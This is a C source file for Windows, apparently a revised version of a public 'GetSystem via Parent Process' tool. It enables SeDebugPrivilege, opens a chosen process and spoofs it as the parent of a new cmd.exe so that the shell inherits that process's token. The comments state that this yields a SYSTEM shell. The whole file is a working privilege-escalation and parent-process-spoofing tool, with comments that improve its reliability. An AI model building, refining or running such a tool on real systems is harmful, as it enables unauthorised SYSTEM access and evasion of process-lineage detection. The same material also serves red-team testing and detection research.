  1. #include "stdafx.h"
  2.  
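/*
 * Enable or disable one named privilege on hToken.
 *
 * hToken           Token opened with at least TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY.
 * Privilege        Privilege name constant, e.g. SE_DEBUG_NAME.
 * bEnablePrivilege TRUE to set SE_PRIVILEGE_ENABLED, FALSE to clear it.
 *
 * Returns TRUE only when the privilege is now in the requested state.
 * AdjustTokenPrivileges can only toggle privileges the token already holds;
 * if the named privilege is absent it still returns TRUE but sets the last
 * error to ERROR_NOT_ALL_ASSIGNED. That case is reported as FALSE here so
 * callers never proceed believing the privilege is in effect when it is not.
 */
BOOL SetPrivilege(HANDLE hToken, LPCTSTR Privilege, BOOL bEnablePrivilege) {
    LUID luid;
    if (!LookupPrivilegeValue(NULL, Privilege, &luid)) {
        return FALSE;
    }

    /* One adjustment is enough: per the AdjustTokenPrivileges documentation
     * only SE_PRIVILEGE_ENABLED (and SE_PRIVILEGE_REMOVED) are honoured in
     * Attributes, so the old "disable first, then re-apply the previous
     * attributes with the bit toggled" sequence added nothing except a window
     * in which the privilege was transiently disabled. */
    TOKEN_PRIVILEGES tp;
    tp.PrivilegeCount = 1;
    tp.Privileges[0].Luid = luid;
    tp.Privileges[0].Attributes = bEnablePrivilege ? SE_PRIVILEGE_ENABLED : 0;

    if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL)) {
        return FALSE;
    }
    /* A TRUE return is not sufficient: the call "succeeds" even when it could
     * not assign every requested privilege. */
    if (GetLastError() == ERROR_NOT_ALL_ASSIGNED) {
        return FALSE;
    }
    return TRUE;
}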
  49.  
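/*
 * Enable SeDebugPrivilege for the calling thread.
 *
 * The privilege is enabled on the thread's impersonation token, not on the
 * process token, so the change is scoped to this thread. If the thread is not
 * yet impersonating, ImpersonateSelf() gives it an impersonation token derived
 * from the process token to adjust. That impersonation is deliberately left in
 * place on success, because the caller's subsequent OpenProcess() on this
 * thread must run under the adjusted token; on any failure after
 * ImpersonateSelf() it is reverted so the thread is not left impersonating
 * for nothing.
 *
 * Returns 1 on success, 0 on failure (the failing API is named on stdout).
 * This cannot grant SeDebugPrivilege to a token that does not hold it; the
 * process must already run with a token carrying it (e.g. elevated admin).
 */
DWORD EnableDebug(void) {
    const DWORD access = TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY;
    HANDLE hToken = NULL;
    BOOL impersonating = FALSE;

    if (!OpenThreadToken(GetCurrentThread(), access, FALSE, &hToken)) {
        if (GetLastError() != ERROR_NO_TOKEN) {
            printf("OpenThreadToken failed (%lu)\n", (unsigned long)GetLastError());
            return 0;
        }
        /* No impersonation token yet: impersonate ourselves so this thread
         * gets its own token to adjust. */
        if (!ImpersonateSelf(SecurityImpersonation)) {
            printf("ImpersonateSelf failed (%lu)\n", (unsigned long)GetLastError());
            return 0;
        }
        impersonating = TRUE;
        if (!OpenThreadToken(GetCurrentThread(), access, FALSE, &hToken)) {
            printf("OpenThreadToken failed (%lu)\n", (unsigned long)GetLastError());
            RevertToSelf();
            return 0;
        }
    }

    DWORD ok = 1;
    if (!SetPrivilege(hToken, SE_DEBUG_NAME, TRUE)) {
        printf("Error SetPrivilege: SeDebugPrivilege not enabled (%lu)\n",
               (unsigned long)GetLastError());
        if (impersonating) {
            RevertToSelf();
        }
        ok = 0;
    }

    /* The adjustment lives on the token object, not on this handle, so the
     * handle is released on every path (the original leaked it on success). */
    CloseHandle(hToken);
    return ok;
}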
  81.  
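/* Image to launch under the spoofed parent (fixed absolute path, PATH is not consulted). */
static const char kChildImage[] = "C:\\Windows\\system32\\cmd.exe";

/*
 * Parse a decimal PID from text.
 *
 * Returns TRUE and stores the value in *pid only when the whole string is a
 * positive decimal number that fits in a DWORD. atoi() would silently turn
 * "abc" or "-5" into 0, which then surfaced as a misleading "PID 0" error.
 */
static BOOL parse_pid(const char *text, DWORD *pid) {
    char *end = NULL;
    unsigned long value;

    /* strtoul() accepts a leading sign and whitespace; a PID has neither. */
    if (text == NULL || *text < '0' || *text > '9') {
        return FALSE;
    }
    value = strtoul(text, &end, 10);
    if (*end != '\0' || value == 0 || value > 0xFFFFFFFFul) {
        return FALSE;
    }
    *pid = (DWORD)value;
    return TRUE;
}

/*
 * Start kChildImage with hParent as its (spoofed) parent process.
 *
 * hParent must carry PROCESS_CREATE_PROCESS. The child is created in the
 * context of that parent and so receives the parent's primary token, which is
 * what yields a SYSTEM shell when hParent refers to a SYSTEM process.
 *
 * Returns ERROR_SUCCESS with the child's handles in *pi (the caller closes
 * them), otherwise the Win32 error code of the API that failed. Every call
 * in the attribute-list setup is checked; the original ignored all of them
 * and would dereference NULL if HeapAlloc failed.
 */
static DWORD spawn_with_parent(HANDLE hParent, PROCESS_INFORMATION *pi) {
    STARTUPINFOEXA si;
    SIZE_T size = 0;
    DWORD err = ERROR_SUCCESS;

    ZeroMemory(&si, sizeof(si));
    ZeroMemory(pi, sizeof(*pi));
    si.StartupInfo.cb = sizeof(si);

    /* First call only reports the required size (it returns FALSE by design). */
    InitializeProcThreadAttributeList(NULL, 1, 0, &size);
    if (size == 0) {
        return GetLastError();
    }
    si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, size);
    if (si.lpAttributeList == NULL) {
        return ERROR_NOT_ENOUGH_MEMORY;
    }
    if (!InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &size)) {
        err = GetLastError();
        goto free_list;
    }
    /* The attribute stores a pointer to the HANDLE, not the handle value. */
    if (!UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,
                                   &hParent, sizeof(hParent), NULL, NULL)) {
        err = GetLastError();
        goto delete_list;
    }

    /* bInheritHandles is FALSE: the token comes from the parent attribute, not
     * from handle inheritance, and with CREATE_NEW_CONSOLE and no
     * STARTF_USESTDHANDLES the child needs nothing inherited. Leaving it TRUE
     * would pull every inheritable handle of the spoofed parent into cmd.exe
     * for no reason. STARTUPINFOEXA begins with a STARTUPINFOA, so passing
     * &si.StartupInfo avoids the reinterpret_cast. */
    if (!CreateProcessA(kChildImage, NULL, NULL, NULL, FALSE,
                        EXTENDED_STARTUPINFO_PRESENT | CREATE_NEW_CONSOLE,
                        NULL, NULL, &si.StartupInfo, pi)) {
        err = GetLastError();
    }

delete_list:
    DeleteProcThreadAttributeList(si.lpAttributeList);
free_list:
    HeapFree(GetProcessHeap(), 0, si.lpAttributeList);
    return err;
}

/*
 * Entry point: usage is "<prog> PID", where PID is the process to present as
 * the parent of the new cmd.exe.
 *
 * Exit codes: 0 success, 1 bad arguments, 2 could not open the parent,
 * 3 could not create the child.
 */
int main(int argc, char **argv) {
    DWORD pid = 0;
    HANDLE hParent = NULL;
    PROCESS_INFORMATION pi;
    DWORD err;

    printf("GetSystem via Parent Process\n");
    printf("Created by @_xpn_\n\n");

    if (argc != 2 || !parse_pid(argv[1], &pid)) {
        printf("Usage: %s PID\n", argv[0]);
        return 1;
    }

    /* SeDebugPrivilege is what lets OpenProcess reach SYSTEM processes. The
     * original discarded this result; a failure is now reported but remains
     * non-fatal, since a less protected parent may still be openable. */
    if (!EnableDebug()) {
        printf("Warning: SeDebugPrivilege not enabled; opening a SYSTEM parent will likely fail\n");
    }

    /* PROCESS_CREATE_PROCESS is the only right PROC_THREAD_ATTRIBUTE_PARENT_PROCESS
     * requires on this handle; PROCESS_ALL_ACCESS asked for far more than used. */
    hParent = OpenProcess(PROCESS_CREATE_PROCESS, FALSE, pid);
    if (hParent == NULL) {
        printf("Error opening PID %lu (%lu)\n", (unsigned long)pid, (unsigned long)GetLastError());
        return 2;
    }

    err = spawn_with_parent(hParent, &pi);
    CloseHandle(hParent);
    if (err != ERROR_SUCCESS) {
        printf("Error creating new process (%lu)\n", (unsigned long)err);
        return 3;
    }

    printf("Enjoy your new SYSTEM process\n");

    /* We do not wait on the child; just drop our references to it. */
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    return 0;
}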